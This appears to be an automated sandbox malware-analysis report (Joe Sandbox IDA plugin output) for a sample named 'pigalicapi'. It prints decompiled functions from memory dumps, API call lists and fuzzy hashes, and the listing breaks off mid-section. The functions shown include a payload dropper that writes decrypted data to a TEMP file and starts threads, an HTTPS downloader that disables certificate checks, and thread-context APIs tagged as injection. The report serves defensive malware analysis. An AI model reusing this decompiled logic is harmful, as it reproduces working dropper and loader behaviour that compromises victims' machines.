Instruction Fuzzy Hash: 677177B1E80318EBFF64DBA0DC89FEA7775AB44705F04498AF30A99182DBB45694CF50

Uniqueness

Uniqueness Score: -1.00%

Function 024E6DA0 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 354
memoryfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E024E6DA0(intOrPtr* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				long _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				char _v324;
				void* _v328;
				char _v340;
				char _v604;
				long _v608;
				int _v612;
				long _v616;
				void* _v620;
				long _v624;
				intOrPtr _v628;
				void* _v632;
				intOrPtr _t198;
				struct _SECURITY_ATTRIBUTES* _t217;
				void* _t223;
				struct _SECURITY_ATTRIBUTES* _t248;
				void* _t347;
				void* _t349;
				void* _t350;

				_v8 = _a4;
				if(_v8 == 0) {
					L39:
					return 0;
				}
				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
				__imp__CoInitialize(0);
				_v32 =  *_v8;
				_v28 =  *((intOrPtr*)(_v8 + 4));
				_v24 =  *((intOrPtr*)(_v8 + 8));
				_v12 =  *(_v8 + 0x14);
				_v20 =  *(_v8 + 0xc);
				_v16 =  *((intOrPtr*)(_v8 + 0x10));
				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
					E024E7D20( &_v340,  &_v340, 0, 0xa);
					E024E9730( &_v340, 4);
					_t349 = _t347 + 0x14;
					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
					if(_v328 != 0xffffffff) {
						_v608 = 0;
						_v612 = 0;
						_v616 =  *(_v8 + 0x1c);
						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
						} else {
							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
							if(_v620 != 0) {
								if(E024E6260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
									_v616 = _v624;
								}
								VirtualFree(_v620, 0, 0x8000);
							}
						}
						CloseHandle(_v328);
						if(_v612 != 0 && _v608 == _v616) {
							_t198 = E024E1E60( &_v324);
							_t350 = _t349 + 4;
							_v628 = _t198;
							if(_v628 != 0) {
								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
									E024E73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
									_t350 = _t350 + 0xc;
								}
								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
									E024E2510(_v628, 0x24ee290);
								}
							}
						}
					}
					L38:
					__imp__CoUninitialize();
					goto L39;
				}
				_v40 = 0;
				_v36 = 0;
				_v44 = 0;
				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
					_t217 = E024E2070( *(_v8 + 0x18));
					_t347 = _t347 + 4;
					_v40 = _t217;
				} else {
					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
					if(_v48 != 0) {
						if(E024E6260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
							_t248 = E024E2070(_v48);
							_t347 = _t347 + 4;
							_v40 = _t248;
							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
								E024E7B70(_v36, _v48, _v44);
								_t347 = _t347 + 0xc;
							}
						}
						VirtualFree(_v48, 0, 0x8000);
					}
				}
				if(_v40 == 0) {
					L22:
					goto L38;
				} else {
					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
						E024E73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
						_t347 = _t347 + 0xc;
					}
					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
						_t223 = E024E97A0(0x10);
						_t347 = _t347 + 4;
						_v632 = _t223;
						_v52 = _v632;
						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
							if( *_v52 != 0) {
								E024E7B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
								_t347 = _t347 + 0xc;
								 *(_v52 + 4) =  *(_v8 + 0x1c);
							}
						} else {
							 *_v52 = _v36;
							 *(_v52 + 4) = _v44;
						}
						if( *_v52 != 0) {
							 *(_v52 + 8) =  *(_v8 + 0xc);
							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
							_v56 = CreateThread(0, 0, E024E77B0, _v52, 0, 0);
							CloseHandle(_v56);
						}
					}
					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
						E024E2510(_v40, 0x24ee290);
					}
					goto L22;
				}
			}

0x024e6dac
0x024e6db3
0x024e723f
0x024e7244
0x024e7244
0x024e6dc9
0x024e6dd1
0x024e6ddc
0x024e6de5
0x024e6dee
0x024e6df7
0x024e6e00
0x024e6e09
0x024e6e15
0x024e7028
0x024e7039
0x024e704a
0x024e704f
0x024e7077
0x024e7099
0x024e70a6
0x024e70ac
0x024e70b6
0x024e70c6
0x024e70d5
0x024e71af
0x024e70db
0x024e70eb
0x024e7107
0x024e7114
0x024e713d
0x024e7163
0x024e716f
0x024e716f
0x024e7183
0x024e7183
0x024e7189
0x024e71bc
0x024e71c9
0x024e71e0
0x024e71e5
0x024e71e8
0x024e71f5
0x024e71fe
0x024e7212
0x024e7217
0x024e7217
0x024e7223
0x024e7231
0x024e7236
0x024e7223
0x024e71f5
0x024e71c9
0x024e7239
0x024e7239
0x00000000
0x024e7239
0x024e6e1b
0x024e6e22
0x024e6e29
0x024e6e39
0x024e6eec
0x024e6ef1
0x024e6ef4
0x024e6e3f
0x024e6e4f
0x024e6e65
0x024e6e6c
0x024e6e8c
0x024e6e92
0x024e6e97
0x024e6e9a
0x024e6ea6
0x024e6ebb
0x024e6eca
0x024e6ecf
0x024e6ecf
0x024e6ea6
0x024e6edd
0x024e6edd
0x024e6ee3
0x024e6efb
0x024e7012
0x00000000
0x024e6f01
0x024e6f08
0x024e6f1c
0x024e6f21
0x024e6f21
0x024e6f2d
0x024e6f35
0x024e6f3a
0x024e6f3d
0x024e6f49
0x024e6f55
0x024e6f83
0x024e6f8b
0x024e6fa1
0x024e6fa6
0x024e6fb2
0x024e6fb2
0x024e6f57
0x024e6f5d
0x024e6f65
0x024e6f65
0x024e6fbb
0x024e6fc6
0x024e6fcf
0x024e6fe9
0x024e6ff0
0x024e6ff0
0x024e6fbb
0x024e6fff
0x024e700a
0x024e700f
0x00000000
0x024e6fff

APIs

Sleep.KERNEL32(?), ref: 024E6DC9
CoInitialize.OLE32(00000000), ref: 024E6DD1
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E6E5F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 024E6EB5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 024E6EDD
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 024E6F7A
CreateThread.KERNEL32 ref: 024E6FE3
CloseHandle.KERNEL32(?), ref: 024E6FF0
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 024E7028
GetTickCount.KERNEL32 ref: 024E7059
GetTempFileNameA.KERNEL32(?,?,00000000), ref: 024E7077
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 024E7093
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 024E7101
WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 024E715D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 024E7183
WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 024E71A9
CloseHandle.KERNEL32(000000FF), ref: 024E71BC
CoUninitialize.OLE32 ref: 024E7239

Strings

TEMP, xrefs: 024E7023

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
String ID: TEMP
API String ID: 3110491842-1036413054
Opcode ID: b7cea11dadef9d3a40ec9fde38666430fe7c89295f6ff45fae73225b9630630e
Instruction ID: 14d41e2f2cb2baa49569bb4af3de243610aa1c42e8ba24806414e5d6ec32d15d
Opcode Fuzzy Hash: b7cea11dadef9d3a40ec9fde38666430fe7c89295f6ff45fae73225b9630630e
Instruction Fuzzy Hash: 53F12B75E00208EFEB18DF94D984FAEB7B5BB48305F208599E50AAB381D771AE41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 024E2900 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 133
networkfilestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E2900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				CHAR* _v28;
				char _v292;
				void _v296;
				void* _v300;
				long _v304;
				long _v308;
				char* _t54;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
					_t54 =  *0x24ee004; // 0x24ec398
					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
					if(_v12 != 0) {
						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x24ec3d2, 0x24ec3d1, 3, 0, 0);
						if(_v16 != 0) {
							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
							if(_v20 != 0) {
								wsprintfA( &_v292, "https://%s", _a4);
								_v28 = "Accept: */*";
								_v24 = 4;
								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
								_v296 = _v296 | 0x0000b180;
								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
									_v308 = GetLastError();
								} else {
									_v300 = 0;
									while(_v300 < _a12) {
										_v304 = 0;
										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
										if(_v304 != 0) {
											_v300 = _v300 + _v304;
											 *(_a8 + _v300) = 0;
											continue;
										} else {
										}
										break;
									}
									_v8 = _v300;
								}
								InternetCloseHandle(_v20);
							}
							InternetCloseHandle(_v16);
						}
						InternetCloseHandle(_v12);
					}
				}
				return _v8;
			}

0x024e2909
0x024e2914
0x024e2936
0x024e2942
0x024e2949
0x024e2972
0x024e2979
0x024e29a3
0x024e29aa
0x024e29c0
0x024e29c9
0x024e29d0
0x024e29e8
0x024e29f9
0x024e2a0e
0x024e2a33
0x024e2ab5
0x024e2a35
0x024e2a35
0x024e2a3f
0x024e2a4a
0x024e2a73
0x024e2a80
0x024e2a90
0x024e2a9f
0x00000000
0x00000000
0x024e2a82
0x00000000
0x024e2a80
0x024e2aaa
0x024e2aaa
0x024e2acb
0x024e2acb
0x024e2ad5
0x024e2ad5
0x024e2adf
0x024e2adf
0x024e2949
0x024e2aeb

APIs

InternetOpenA.WININET(024EC398,00000001,00000000,00000000,00000000), ref: 024E293C
InternetConnectA.WININET(00000000,00000000,000001BB,024EC3D2,024EC3D1,00000003,00000000,00000000), ref: 024E296C
HttpOpenRequestA.WININET(00000000,GET,024EC3D8,1.1,00000000,00000000,80800000,00000000), ref: 024E299D
wsprintfA.USER32 ref: 024E29C0
InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 024E29E8
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 024E2A0E
lstrlenA.KERNEL32(024EC3EC,00000000,00000000), ref: 024E2A1C
HttpSendRequestA.WININET(00000000,024EC3EC,00000000), ref: 024E2A2B
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 024E2A73
GetLastError.KERNEL32 ref: 024E2AAF
InternetCloseHandle.WININET(00000000), ref: 024E2ACB
InternetCloseHandle.WININET(00000000), ref: 024E2AD5
InternetCloseHandle.WININET(00000000), ref: 024E2ADF

Strings

GET, xrefs: 024E2994
1.1, xrefs: 024E298A
https://%s, xrefs: 024E29B4

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
String ID: 1.1$GET$https://%s
API String ID: 2082764430-1670984264
Opcode ID: 163070a502a5bdbd602e600b9acbf2988d33f8b247e6446a9d78c56fca28cf4c
Instruction ID: 3f2a73fed45e1b7f6004432fc4d681ce792a8a62b4bb579f04b00d6f6f36d29a
Opcode Fuzzy Hash: 163070a502a5bdbd602e600b9acbf2988d33f8b247e6446a9d78c56fca28cf4c
Instruction Fuzzy Hash: 4C511F71940218EFFF24DF94DC89BEEB7B5AB48705F10458AF906A6280C7B49A94CF54

Uniqueness

Uniqueness Score: -1.00%

Function 024E35E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 184
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E35E0(CHAR* _a4, intOrPtr _a8) {
				long _v8;
				struct HINSTANCE__* _v12;
				char _v532;
				void* _v536;
				long _v540;
				void* _v544;
				long _v548;
				CHAR* _v552;
				void* _v556;
				int _v560;
				char _v820;
				CHAR* _v824;
				char _v1084;
				signed char _v1085;
				long _v1092;
				intOrPtr _v1096;
				long _t124;

				_v8 = 0;
				_v12 = GetModuleHandleA(_a4);
				if(_v12 != 0) {
					E024E2E50( &_v532,  &_v532, 0, 0x208);
					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
						if(_v536 != 0xffffffff) {
							_v540 = GetFileSize(_v536, 0);
							if(_v540 > 0) {
								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
								_t155 = _v544;
								if(_v544 != 0) {
									_v548 = 0;
									ReadFile(_v536, _v544, _v540,  &_v548, 0);
									_v556 = E024E3370(_v536, _t155, _v544, _v540);
									_v552 = E024E3580(_a8, _v556, _a8);
									_v560 = lstrlenA(_v552);
									if(_v560 > 2 && _v560 < 0x100) {
										_v824 = _v552;
										_v1085 = 0;
										E024E2E50(_v552,  &_v820, 0, 0x100);
										E024E2E50(_v552,  &_v1084, 0, 0x100);
										_v1092 = 0;
										while(_v1092 < _v560) {
											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
											} else {
												if(_v824[_v1092] != 0x2e) {
													_t124 = _v1092 + 1;
													__eflags = _t124;
													_v1092 = _t124;
													continue;
												} else {
													lstrcpynA( &_v820, _v824, _v1092 + 1);
													lstrcatA( &_v820, ".dll");
													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
													_v1085 = 1;
												}
											}
											break;
										}
										if((_v1085 & 0x000000ff) != 0) {
											_v8 = E024E35E0( &_v820,  &_v1084);
										}
									}
									if(_v8 == 0 && _v552 != 0) {
										_v1096 = _v552 - _v556;
										_v8 = _v12 + _v1096;
									}
									VirtualFree(_v556, 0, 0x8000);
									VirtualFree(_v544, 0, 0x8000);
								}
							}
							CloseHandle(_v536);
						}
					}
				}
				return _v8;
			}

0x024e35e9
0x024e35fa
0x024e3601
0x024e3615
0x024e3635
0x024e3657
0x024e3664
0x024e3679
0x024e3686
0x024e36a2
0x024e36a8
0x024e36af
0x024e36b5
0x024e36dd
0x024e36f9
0x024e3712
0x024e3725
0x024e3732
0x024e374e
0x024e3754
0x024e3769
0x024e377f
0x024e3787
0x024e37a2
0x024e37c6
0x024e37e0
0x024e37f2
0x024e3799
0x024e3799
0x024e379c
0x00000000
0x024e37f4
0x024e380c
0x024e381e
0x024e383c
0x024e3842
0x024e3842
0x024e37f2
0x00000000
0x024e37c6
0x024e385d
0x024e3875
0x024e3875
0x024e385d
0x024e387c
0x024e3893
0x024e38a2
0x024e38a2
0x024e38b3
0x024e38c7
0x024e38c7
0x024e36af
0x024e38d4
0x024e38d4
0x024e3664
0x024e3635
0x024e38e0

APIs

GetModuleHandleA.KERNEL32(?), ref: 024E35F4
GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 024E362D
CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 024E3651
GetFileSize.KERNEL32(000000FF,00000000), ref: 024E3673
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E369C
ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E36DD
lstrlenA.KERNEL32(?), ref: 024E371F
lstrcpynA.KERNEL32(?,?,-00000001), ref: 024E380C
lstrcatA.KERNEL32(?,.dll), ref: 024E381E
lstrcpyA.KERNEL32(?,?), ref: 024E383C
VirtualFree.KERNEL32(?,00000000,00008000), ref: 024E38B3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E38C7
CloseHandle.KERNEL32(000000FF), ref: 024E38D4

Strings

.dll, xrefs: 024E3812

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
String ID: .dll
API String ID: 4040249471-2738580789
Opcode ID: 756139033161687e550d9541d2524eb2eff1a597f9511a81c4fde0575bc7e0d7
Instruction ID: ef3b838a98193b55f08c49d8b0fc514e0a3e67fb2db7d4b76ec295deae68d403
Opcode Fuzzy Hash: 756139033161687e550d9541d2524eb2eff1a597f9511a81c4fde0575bc7e0d7
Instruction Fuzzy Hash: 91816EB1D40228EBEF25DF90DC88BE9BBB5BB48305F1045CAE21AA7281D7745B84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00417503 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 138
fileCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00417503() {
				char _v12;
				char _v16;
				char** _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v80;
				char* _v84;
				char* _v88;
				char* _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr* _t58;
				void* _t71;
				char* _t81;
				char* _t92;
				char* _t94;
				void* _t102;
				void* _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				char** _t116;

				asm("adc al, 0x42");
				es = _t114;
				 *_t58 =  *_t58 + _t58;
				_t116 = _t115 - 0x68;
				_v48 =  &_v12;
				 *_t116 =  &_v80;
				_v56 = E00418AA0;
				_v52 = 0x4191dc;
				_v44 = E00417690;
				_v40 = _t116;
				E0040E1A0(_t103 + _t103, _t107, _t114);
				if( *0x41ea6c != 0) {
					_v100 = 0x1d;
					_v104 = 1;
					 *_t116 = "terminate called recursively\n";
					_v96 = __imp___iob + 0x40;
					_v76 = 0xffffffff;
					fwrite(??, ??, ??, ??);
					abort();
					L8:
					 *_t116 = _v88;
					free(??);
					L5:
					_v76 = 1;
					E004189C0();
					L6:
					 *_t116 = _v88;
					fputs(??, ??);
					L4:
					_v100 = 2;
					_v104 = 1;
					 *_t116 = "\'\n";
					_v96 = __imp___iob + 0x40;
					_v76 = 0xffffffff;
					fwrite(??, ??, ??, ??);
					if(_v16 == 0) {
						goto L8;
					}
					goto L5;
				}
				 *0x41ea6c = 1;
				_t71 = E00418390();
				if(_t71 == 0) {
					_v100 = 0x2d;
					_v104 = 1;
					 *_t116 = "terminate called without an active exception\n";
					_v96 = __imp___iob + 0x40;
					_v76 = 0xffffffff;
					fwrite(??, ??, ??, ??);
					while(1) {
						_v76 = 0xffffffff;
						abort();
						E004183F0(_t102, _t112, _t113, _t114);
						_v76 = 0xffffffff;
						 *_t116 = _v88;
						E0040E810();
						_t107 = _t107 - 1;
						 *_t116 = _v88;
						if(_t107 != 0) {
							E00418140(_t102, _t112, _t113, _t114);
							_v76 = 0xffffffff;
							E004183F0(_t102, _t112, _t113, _t114);
						} else {
							_t81 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t102, _t112, _t113, _t114))) + 8))();
							_t109 = __imp___iob;
							_v100 = 0xb;
							_v104 = 1;
							 *_t116 = "  what():  ";
							_v76 = 2;
							_v88 = _t81;
							_t51 = _t109 + 0x40; // 0x76664640
							_v96 = _t51;
							fwrite(??, ??, ??, ??);
							_t107 = __imp___iob;
							_t53 = _t107 + 0x40; // 0x76664640
							_v104 = _t53;
							 *_t116 = _v88;
							fputs(??, ??);
							 *_t116 = 0xa;
							_v104 = __imp___iob + 0x40;
							fputc(??, ??);
							E004183F0(_t102, _t112, _t113, _t114);
						}
					}
				}
				_v100 = 0;
				_v104 = 0;
				_t92 =  *((intOrPtr*)(_t71 + 4)) + (0 |  *((char*)( *((intOrPtr*)(_t71 + 4)))) == 0x0000002a);
				_v84 = _t92;
				 *_t116 = _t92;
				_v96 =  &_v16;
				_v16 = 0xffffffff;
				_v76 = 0xffffffff;
				_t94 = E0040C8A0();
				_v100 = 0x30;
				_v104 = 1;
				 *_t116 = "terminate called after throwing an instance of \'";
				_v88 = _t94;
				_v96 = __imp___iob + 0x40;
				fwrite(??, ??, ??, ??);
				_v104 = __imp___iob + 0x40;
				if(_v16 == 0) {
					goto L6;
				}
				_v76 = 0xffffffff;
				 *_t116 = _v84;
				fputs(??, ??);
				goto L4;
			}

APIs

fwrite.MSVCRT ref: 004175CF
fputs.MSVCRT ref: 004175F6
fwrite.MSVCRT ref: 00417626
fputs.MSVCRT ref: 00417646
fwrite.MSVCRT ref: 00417678
abort.MSVCRT ref: 0041767D
free.MSVCRT ref: 00417689
fwrite.MSVCRT ref: 004176D6
abort.MSVCRT ref: 004176E3
fwrite.MSVCRT ref: 00417749
fputs.MSVCRT ref: 00417762
fputc.MSVCRT ref: 0041777A

Strings

-, xrefs: 004176B0

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: fwrite$fputs$abort$fputcfree
String ID: -
API String ID: 4137898067-2547889144
Opcode ID: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
Instruction ID: 7c812a2032c8a6cafb97bb0affd1969c62a9733217d5893787fd2abbdd02fbd7
Opcode Fuzzy Hash: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
Instruction Fuzzy Hash: 9551F8B15083418FD310EF2AC54524ABBE0BF84328F448E2EE4E89B391D77D94858F8B

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 18.2, APIs: 12, Instructions: 176threadinjectionsynchronizationCOMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 00412432
InterlockedIncrement.KERNEL32 ref: 00412492
SetEvent.KERNEL32 ref: 004124A5
InterlockedIncrement.KERNEL32 ref: 004124F7
SetEvent.KERNEL32 ref: 0041250A
SuspendThread.KERNEL32 ref: 00412560
WaitForSingleObject.KERNEL32 ref: 00412575
GetThreadContext.KERNEL32 ref: 00412592
SetThreadContext.KERNEL32(00000000,00000000), ref: 004125AE
InterlockedIncrement.KERNEL32(00000000), ref: 004125D7
SetEvent.KERNEL32(00000000), ref: 004125E8
ResumeThread.KERNEL32(00000000), ref: 004125FD

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Thread$EventIncrementInterlocked$Context$HandleInformationObjectResumeSingleSuspendWait
String ID:
API String ID: 2723890135-0
Opcode ID: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
Instruction ID: 8a0950f165c45e38fbf2d56c6a54e5c88b37052457152439e3475d81f3650815
Opcode Fuzzy Hash: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
Instruction Fuzzy Hash: A16180B06042009FCB10EF74DA886AABFF4EF04350F51496EEC95DB245D7B8D891CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00416080 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 004160BA
CreateSemaphoreA.KERNEL32 ref: 0041610E
CreateSemaphoreA.KERNEL32 ref: 00416135
InitializeCriticalSection.KERNEL32 ref: 00416154
InitializeCriticalSection.KERNEL32 ref: 0041615F
InitializeCriticalSection.KERNEL32 ref: 0041616A

Strings

l, xrefs: 004160AB

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID: l
API String ID: 2075313795-2517025534
Opcode ID: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
Instruction ID: 5e8c05b3caea3bf66dc60917ec76161f1da9a774c5b16c6f9788cc368daaae04
Opcode Fuzzy Hash: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
Instruction Fuzzy Hash: E63108B45043049FEB10BF69C58835ABBE4EF40314F15896DDC988B38AE779D498CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 16.7, APIs: 11, Instructions: 194sleepthreadCOMMON

Download Yara Rule

APIs

